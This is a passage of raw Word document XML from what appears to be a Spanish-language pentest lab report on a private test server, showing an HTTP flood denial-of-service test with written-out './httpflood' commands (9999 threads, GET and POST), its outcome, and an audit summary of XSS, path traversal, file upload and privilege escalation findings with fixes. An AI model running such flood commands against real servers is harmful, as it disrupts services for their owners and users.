      </w:r>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>ulimit -n 999999’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E864632" w14:textId="003FD571" w:rsidR="009C1D31" w:rsidRDefault="009C1D31" w:rsidP="00FC10D7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AB88D9" w14:textId="0EC39FA0" w:rsidR="009C1D31" w:rsidRDefault="009C1D31" w:rsidP="009C1D31">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B02351">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00857F50">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>./httpflood  &lt;url&gt; &lt;threads&gt; &lt;get/post&gt; &lt;seconds&gt; &lt;header.txt/nil&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B220FD5" w14:textId="2E6382B7" w:rsidR="009C1D31" w:rsidRPr="009C1D31" w:rsidRDefault="009C1D31" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En este caso la URL será </w:t>
      </w:r>
      <w:hyperlink r:id="rId338" w:history="1">
        <w:r w:rsidRPr="009A6254">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, los threads </w:t>
      </w:r>
      <w:r w:rsidR="00F67627">
        <w:t>9999</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, método </w:t>
      </w:r>
      <w:r w:rsidR="00D911EB">
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="00707002">
        <w:t>, 10</w:t>
      </w:r>
      <w:r w:rsidR="000C1609">
        <w:t xml:space="preserve">0  que va durar el ataque </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y para un header </w:t>
      </w:r>
      <w:r w:rsidR="00E559F9">
        <w:t>automático</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> usaré nil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEC0B78" w14:textId="77777777" w:rsidR="009C1D31" w:rsidRDefault="009C1D31" w:rsidP="00FC10D7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C8F715" w14:textId="03CED4D2" w:rsidR="00FC10D7" w:rsidRDefault="009C1D31" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El comando sería este: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C72B45" w14:textId="77777777" w:rsidR="002A0D7B" w:rsidRDefault="002A0D7B" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD5928F" w14:textId="44EFAC51" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00F67627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39B2724C" wp14:editId="4BE56DE5">
            <wp:extent cx="5400040" cy="2391410"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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00040" cy="2391410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEBF94C" w14:textId="57C5EEBC" w:rsidR="008F2EB0" w:rsidRDefault="008F2EB0" w:rsidP="00FC10D7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3C6705" w14:textId="0FA61E54" w:rsidR="00F67627" w:rsidRDefault="00F67627" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Preparación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E63010" w14:textId="77777777" w:rsidR="002A0D7B" w:rsidRDefault="002A0D7B" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A7C5BAD" w14:textId="49E70428" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00F67627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E9749F9" wp14:editId="68D8F572">
            <wp:extent cx="5400040" cy="284480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00040" cy="2844800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="390BBBC2" w14:textId="670BCC82" w:rsidR="008F2EB0" w:rsidRDefault="008F2EB0" w:rsidP="00FC10D7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A0AF9C" w14:textId="2E556D97" w:rsidR="008F2EB0" w:rsidRDefault="00F67627" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E59F55A" w14:textId="77777777" w:rsidR="008B0253" w:rsidRDefault="008B0253" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299F8FAC" w14:textId="1C0B045D" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00F67627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DB32E30" wp14:editId="7C07B04E">
            <wp:extent cx="5400040" cy="2738120"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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00040" cy="2738120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E41941A" w14:textId="273C917E" w:rsidR="00F67627" w:rsidRDefault="00F67627" w:rsidP="00FC10D7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A9EA23" w14:textId="67CF1D5B" w:rsidR="008F2EB0" w:rsidRDefault="00F67627" w:rsidP="002A0D7B">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t>No se consigue que el servidor caiga, lo que hace el ataque es que valla más lento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D9A031" w14:textId="46E1A5FA" w:rsidR="008F2EB0" w:rsidRDefault="008F2EB0" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora probaremos con </w:t>
      </w:r>
      <w:r w:rsidR="00F67627">
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:t>, usando este comando : ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="009C1D31">
        <w:t xml:space="preserve">./httpflood  </w:t>
      </w:r>
      <w:r>
        <w:t>http://192.168.1.99:8080</w:t>
      </w:r>
      <w:r w:rsidRPr="009C1D31">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">9999 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C1D31">
        <w:t xml:space="preserve">post </w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="009C1D31">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>nil’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A94C86" w14:textId="3A4BF94D" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r w:rsidRPr="000C1609">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FA7E541" wp14:editId="3EE3A7C4">
            <wp:extent cx="5400040" cy="25209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00040" cy="2520950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F5A25E" w14:textId="3462CF9C" w:rsidR="008F2EB0" w:rsidRDefault="008F2EB0" w:rsidP="00F60378"/>
    <w:p w14:paraId="4DC356E2" w14:textId="338D0E72" w:rsidR="008F2EB0" w:rsidRPr="006845D3" w:rsidRDefault="008F2EB0" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t>Podemos ver como la página tarde más en cargar, pero no se consigue que no responda</w:t>
      </w:r>
      <w:r w:rsidR="00F67627">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54727CE1" w14:textId="13A82AB5" w:rsidR="00A668E3" w:rsidRDefault="00A668E3" w:rsidP="006B5FCA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5BE92E" w14:textId="261D760D" w:rsidR="00A668E3" w:rsidRDefault="00A668E3" w:rsidP="006B5FCA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A34A302" w14:textId="1CEDEFBC" w:rsidR="00A668E3" w:rsidRPr="0064512E" w:rsidRDefault="00A668E3" w:rsidP="006B5FCA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A392FA7" w14:textId="1EE5E007" w:rsidR="006B5FCA" w:rsidRPr="0064512E" w:rsidRDefault="006B5FCA" w:rsidP="006B5FCA"/>
    <w:p w14:paraId="2D636821" w14:textId="77777777" w:rsidR="00DC1AC2" w:rsidRPr="0064512E" w:rsidRDefault="00DC1AC2" w:rsidP="00E456B4"/>
    <w:p w14:paraId="5FD8412E" w14:textId="442739B6" w:rsidR="00E456B4" w:rsidRDefault="00E456B4" w:rsidP="00E456B4">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc128034194"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Informe de auditoria</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDDE418" w14:textId="6E84328D" w:rsidR="003A00FD" w:rsidRPr="003A00FD" w:rsidRDefault="003A00FD" w:rsidP="003A00FD">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC99473" w14:textId="345B7B5B" w:rsidR="00064E32" w:rsidRDefault="00064E32">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc128034195"/>
      <w:r w:rsidRPr="00064E32">
        <w:t>Informe ejecutivo</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="34982E4C" w14:textId="4D34E416" w:rsidR="000D2BB8" w:rsidRDefault="000D2BB8" w:rsidP="000D2BB8"/>
    <w:p w14:paraId="011F0EF7" w14:textId="3F8CC01E" w:rsidR="000D2BB8" w:rsidRDefault="000D2BB8" w:rsidP="000D2BB8">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahora procederé a explicar las vulnerabilidades encontradas en la prueba de pentesting y </w:t>
      </w:r>
      <w:r w:rsidR="00E17E37">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>su nivel de amenaza:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B30470" w14:textId="0FBDEAD9" w:rsidR="00E17E37" w:rsidRDefault="00E17E37" w:rsidP="000D2BB8">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E7361E" w14:textId="4F0F9536" w:rsidR="00E17E37" w:rsidRDefault="00E17E37" w:rsidP="000D2BB8">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>En el análisis se encontraron estas vulnerabilidades:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DC1BE6" w14:textId="38C3BBD9" w:rsidR="00E17E37" w:rsidRDefault="00E17E37" w:rsidP="000D2BB8">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E17E37">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="317E73B5" wp14:editId="11E3AE6D">
            <wp:extent cx="5400040" cy="379603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00040" cy="3796030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="480A4AAC" w14:textId="7456D5AE" w:rsidR="00172E5E" w:rsidRPr="000D2BB8" w:rsidRDefault="00172E5E" w:rsidP="000D2BB8">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172E5E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42506EA5" wp14:editId="5D51D83A">
            <wp:extent cx="5400040" cy="1550035"/>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00040" cy="1550035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383390E" w14:textId="77777777" w:rsidR="00064E32" w:rsidRDefault="00064E32" w:rsidP="00064E32">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473FF794" w14:textId="7C8C585F" w:rsidR="00E17E37" w:rsidRDefault="00E17E37" w:rsidP="00064E32">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Lo importante son las vulnerabilidades de nivel alto y medio, las otras n</w:t>
      </w:r>
      <w:r w:rsidR="00685F55">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tendrían mucha importancia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2727D4" w14:textId="7FA92C8B" w:rsidR="00685F55" w:rsidRDefault="00685F55" w:rsidP="00064E32">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Además de estas vulnerabilidades se encontró otras que se podrían categorizar de nivel alto: File Upload</w:t>
      </w:r>
      <w:r w:rsidR="00234757">
        <w:t>, DoS</w:t>
      </w:r>
      <w:r w:rsidR="0033135D">
        <w:t>, Escalado de Privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03701720" w14:textId="7E33DED1" w:rsidR="00685F55" w:rsidRDefault="00685F55" w:rsidP="00064E32">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C48006B" w14:textId="77777777" w:rsidR="00E17E37" w:rsidRDefault="00E17E37" w:rsidP="00064E32">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284E9137" w14:textId="65BF07D1" w:rsidR="00E17E37" w:rsidRDefault="00E17E37" w:rsidP="00064E32">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Tenemos estas vulnerabilidades de nivel alto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9BD9C1" w14:textId="77777777" w:rsidR="00BA2965" w:rsidRDefault="00BA2965" w:rsidP="00064E32">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C88268F" w14:textId="02526EFE" w:rsidR="00E17E37" w:rsidRDefault="00E17E37" w:rsidP="002F107A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>XSS -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F78C9C9" w14:textId="77777777" w:rsidR="00741C32" w:rsidRPr="00741C32" w:rsidRDefault="00741C32" w:rsidP="00741C32"/>
    <w:p w14:paraId="6479C603" w14:textId="03D642EB" w:rsidR="004140D1" w:rsidRDefault="004140D1" w:rsidP="004140D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Esta vulnerabilidad está orientada al usuario, lo que nos permite es inyectar código JavaScript en el navegador y modificar su comportamiento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C0C387" w14:textId="2250DA6F" w:rsidR="004140D1" w:rsidRDefault="004140D1" w:rsidP="004140D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Para solucionar esta vulnerabilidad lo que habría que hacer es filtrar todas las entradas de los usuarios, para impedir que se pudieran ejecutar estos comandos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D88AE0" w14:textId="688562A7" w:rsidR="002F107A" w:rsidRDefault="002F107A" w:rsidP="004140D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035E16CA" w14:textId="77777777" w:rsidR="00BA2965" w:rsidRDefault="00BA2965" w:rsidP="004140D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA30F02" w14:textId="6C5E9D9E" w:rsidR="00B52AC9" w:rsidRDefault="00E17E37" w:rsidP="002F107A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Path Transversal -&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00BB1611">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0A10C3" w14:textId="77777777" w:rsidR="00B52AC9" w:rsidRDefault="00B52AC9" w:rsidP="00B52AC9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D166F21" w14:textId="14A2014B" w:rsidR="00BB1611" w:rsidRDefault="00BB1611" w:rsidP="00BB1611">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>En mi opinión como experto, es la vulnerabilidad más importante encontrada, gracias a esta vulnerabilidad podré modificar cualquier archivo del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26184628" w14:textId="634EEBF5" w:rsidR="00302D2F" w:rsidRDefault="00302D2F" w:rsidP="00BB1611">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para prevenir esta vulnerabilidad, tendremos que hacer lo mismo que con XSS, que es limpiar todos los formulario y entradas del usuario para que no se puedan inyectar caracteres con interés </w:t>
      </w:r>
      <w:r w:rsidR="00BA2965">
        <w:t>malicioso</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3990AC63" w14:textId="77777777" w:rsidR="00BA2965" w:rsidRDefault="00BA2965" w:rsidP="00BB1611">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B6AAE0E" w14:textId="280C732C" w:rsidR="00BA2965" w:rsidRDefault="00685F55" w:rsidP="002F107A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>File Upload -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09148036" w14:textId="77777777" w:rsidR="00B52AC9" w:rsidRDefault="00B52AC9" w:rsidP="00B52AC9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED714BB" w14:textId="1D54242C" w:rsidR="00685F55" w:rsidRDefault="00685F55" w:rsidP="00685F55">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esta vulnerabilidad permite subir archivos de cualquier tipo, con lo cual podemos subir archivos que ejecuten programas malignos, aparte de que junto a la vulnerabilidad de ‘Path transversal’ podremos modificar los archivos del servidor. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27717593" w14:textId="08648CEA" w:rsidR="00685F55" w:rsidRDefault="00685F55" w:rsidP="00685F55">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para solucionar este problema podremos hacer en un filtro para impedir que se sub cualquier tipo de archivo, por </w:t>
      </w:r>
      <w:r w:rsidR="004140D1">
        <w:t>ejemplo,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> podremos permitir que se suban solo PD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147E9446" w14:textId="77777777" w:rsidR="00BA2965" w:rsidRDefault="00BA2965" w:rsidP="00685F55">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F1322C" w14:textId="3DB24AC9" w:rsidR="00234757" w:rsidRDefault="00234757" w:rsidP="002F107A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DoS -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1062A3" w14:textId="77777777" w:rsidR="00B52AC9" w:rsidRDefault="00B52AC9" w:rsidP="00B52AC9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F63115E" w14:textId="65DCCE5E" w:rsidR="00234757" w:rsidRDefault="00234757" w:rsidP="00234757">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esta vulnerabilidad permite parar el servicio de la aplicación web, esta vulnerabilidad en esta aplicación web, en esta aplicación web se explota con ‘File Upload’ y </w:t>
      </w:r>
      <w:r w:rsidR="0033135D">
        <w:t>‘Escalado de privilegios’</w:t>
      </w:r>
      <w:r w:rsidR="00BA2965">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E5E48E" w14:textId="77777777" w:rsidR="00BA2965" w:rsidRDefault="00BA2965" w:rsidP="00234757">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD18457" w14:textId="523FA0EB" w:rsidR="00495F9C" w:rsidRDefault="00495F9C" w:rsidP="002F107A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Escalad</w:t>
      </w:r>
      <w:r w:rsidR="00BA2965">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de Privilegios -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596E9B6B" w14:textId="77777777" w:rsidR="00B52AC9" w:rsidRDefault="00B52AC9" w:rsidP="00B52AC9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3349CB69" w14:textId="0946221B" w:rsidR="00495F9C" w:rsidRDefault="00BA2965" w:rsidP="00495F9C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Esta vulnerabilidad lo que intenta es obtener los privilegios más elevados del sistema, en este caso pasar de ser un usuario normal a ser un usuario administrador, en este caso para solucionarlo</w:t>
      </w:r>
      <w:r w:rsidR="00CB125D">
        <w:t xml:space="preserve"> se debería denegar el acceso a los recursos, un usuario no puede poner en una URL una cadena y cambiar su datos de sesión desde ahí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197E3DA0" w14:textId="77777777" w:rsidR="00E17E37" w:rsidRDefault="00E17E37" w:rsidP="00E17E37">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Y estas de nivel medio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB44B6B" w14:textId="0B02ADF8" w:rsidR="00E17E37" w:rsidRDefault="00E17E37" w:rsidP="002F107A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
